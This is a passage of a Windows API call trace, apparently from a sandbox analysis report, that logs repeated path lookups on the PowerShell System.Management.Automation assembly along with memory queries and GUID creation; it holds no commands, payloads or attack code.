lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.644] GetLastError () returned 0x0 [0076.644] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.645] GetLastError () returned 0x0 [0076.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.645] GetLastError () returned 0x0 [0076.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad960, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.645] GetLastError () returned 0x0 [0076.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.645] GetLastError () returned 0x0 [0076.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.645] GetLastError () returned 0x0 [0076.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.645] GetLastError () returned 0x0 [0076.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.645] GetLastError () returned 0x0 [0076.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.645] GetLastError () returned 0x0 [0076.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.646] GetLastError () returned 0x0 [0076.646] VirtualQuery (in: lpAddress=0xacf00, lpBuffer=0xadf00, dwLength=0x1c | out: lpBuffer=0xadf00*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.646] GetLastError () returned 0x0 [0076.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.646] GetLastError () returned 0x0 [0076.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.646] GetLastError () returned 0x0 [0076.646] VirtualQuery (in: lpAddress=0xacf00, lpBuffer=0xadf00, dwLength=0x1c | out: lpBuffer=0xadf00*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.646] GetLastError () returned 0x0 [0076.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.647] GetLastError () returned 0x0 [0076.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xada00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.647] GetLastError () returned 0x0 [0076.647] VirtualQuery (in: lpAddress=0xacf00, lpBuffer=0xadf00, dwLength=0x1c | out: lpBuffer=0xadf00*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.647] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.648] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.649] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.649] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.649] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.649] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.650] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.650] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.650] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.650] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.651] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.651] VirtualQuery (in: lpAddress=0xacd3c, lpBuffer=0xadd3c, dwLength=0x1c | out: lpBuffer=0xadd3c*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.651] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.652] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.652] VirtualQuery (in: lpAddress=0xace98, lpBuffer=0xade98, dwLength=0x1c | out: lpBuffer=0xade98*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.652] VirtualQuery (in: lpAddress=0xaced4, lpBuffer=0xaded4, dwLength=0x1c | out: lpBuffer=0xaded4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.653] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x8e9b788f, Data2=0x11f4, Data3=0x4533, Data4=([0]=0xa1, [1]=0x9d, [2]=0x62, [3]=0x92, [4]=0xf7, [5]=0xd6, [6]=0x20, [7]=0x18))) returned 0x0 [0076.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.653] GetLastError () returned 0x0 [0076.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.653] GetLastError () returned 0x0 [0076.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.653] GetLastError () returned 0x0 [0076.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.653] GetLastError () returned 0x0 [0076.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.653] GetLastError () returned 0x0 [0076.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.653] GetLastError () returned 0x0 [0076.654] CoCreateGuid (in: pguid=0xae248 | out: pguid=0xae248*(Data1=0x617e87d1, Data2=0x2783, Data3=0x41c5, Data4=([0]=0x9f, [1]=0x6f, [2]=0xc5, [3]=0xf5, [4]=0x41, [5]=0x1f, [6]=0x12, [7]=0x31))) returned 0x0 [0076.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.654] GetLastError () returned 0x0 [0076.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.654] GetLastError () returned 0x0 [0076.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.654] GetLastError () returned 0x0 [0076.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad958, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.654] GetLastError () returned 0x0 [0076.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.654] GetLastError () returned 0x0 [0076.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.654] GetLastError () returned 0x0 [0076.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.654] GetLastError () returned 0x0 [0076.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.655] GetLastError () returned 0x0 [0076.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.655] GetLastError () returned 0x0 [0076.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.655] GetLastError () returned 0x0 [0076.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.655] GetLastError () returned 0x0 [0076.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.655] GetLastError () returned 0x0 [0076.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.655] GetLastError () returned 0x0 [0076.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.656] GetLastError () returned 0x0 [0076.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.656] GetLastError () returned 0x0 [0076.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.656] GetLastError () returned 0x0 [0076.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.656] GetLastError () returned 0x0 [0076.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xadaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.656] GetLastError () returned 0x0 [0076.656] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.656] GetLastError () returned 0x0 [0076.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.657] GetLastError () returned 0x0 [0076.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.657] GetLastError () returned 0x0 [0076.657] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.657] VirtualQuery (in: lpAddress=0xacb30, lpBuffer=0xadb30, dwLength=0x1c | out: lpBuffer=0xadb30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.657] GetLastError () returned 0x0 [0076.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.657] GetLastError () returned 0x0 [0076.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.657] GetLastError () returned 0x0 [0076.657] VirtualQuery (in: lpAddress=0xacaf4, lpBuffer=0xadaf4, dwLength=0x1c | out: lpBuffer=0xadaf4*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.658] VirtualQuery (in: lpAddress=0xacb30, lpBuffer=0xadb30, dwLength=0x1c | out: lpBuffer=0xadb30*(BaseAddress=0xac000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad4e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0076.658] GetLastError () returned 0x0 [0076.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xad498, lpFilePart=0x0 | out: 